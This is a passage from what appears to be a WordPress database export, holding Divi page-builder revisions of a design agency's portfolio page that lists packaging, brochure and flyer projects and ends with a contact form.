button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" content__hover_enabled=\"on|desktop\"]<p>The product packaging design is planned keeping in mind the rich and luxory look. The brand colors has been used in an effective arrangement to carry the product family design language and keeping it unique at the same time. Wonderfully executed 3D Mockup.</p>\n[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]03\r[/et_pb_text][et_pb_cta title=\"Zap Booking - Flyer/Emailer Design\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" hover_enabled=\"0\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p>A well structure template has been adopted with the use of brillinat cover image as a hook up factor. Various color has been used to keep the destination identity uniquely defined. Adopted to html emailers for digital campaign.</p>\n[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg\" alt=\"Flyer Design\" title_text=\"Flyer Design-graphic design work\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]04\r[/et_pb_text][et_pb_cta title=\"Ninza - Branding Identity\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','inherit','closed','closed','','396-revision-v1','','','2020-08-08 20:32:39','2020-08-08 20:32:39','',396,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/396-revision-v1/',0,'revision','',0),(721,1,'2020-08-08 20:37:54','2020-08-08 20:37:54','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"50px||50px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]01\r[/et_pb_text][et_pb_cta title=\"Wet & Dry - Corporate Catalogue\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" hover_enabled=\"0\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p>A Corporate Brochure/ Product Catalogue to represent the key USPs of the brand and company as a whole. Wonderful graphic designing and beautiful product shots to make the product and brand stand out for an awesome b2b representaiton.</p>\n[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-b1-1.jpg\" alt=\"Brochure-catalogue\" title_text=\"800x800 b1 (1)\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]02\r[/et_pb_text][et_pb_cta title=\"Neud Hair Spray - Product Packaging\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" hover_enabled=\"0\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" content__hover_enabled=\"on|desktop\"]<p>The product packaging design is planned keeping in mind the rich and luxory look. The brand colors has been used in an effective arrangement to carry the product family design language and keeping it unique at the same time. Wonderfully executed 3D Mockup.</p>\n[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]03\r[/et_pb_text][et_pb_cta title=\"Zap Booking - Flyer/Emailer Design\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" hover_enabled=\"0\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p>A well structure template has been adopted with the use of brillinat cover image as a hook up factor. Various color has been used to keep the destination identity uniquely defined. Adopted to html emailers for digital campaign.</p>\n[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg\" alt=\"Flyer Design\" title_text=\"Flyer Design-graphic design work\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]04\r[/et_pb_text][et_pb_cta title=\"Neud After Lotion - Packaging\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p>Yet another revolutionary product with brilliant design execution. Corporate brand colors </p>[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" 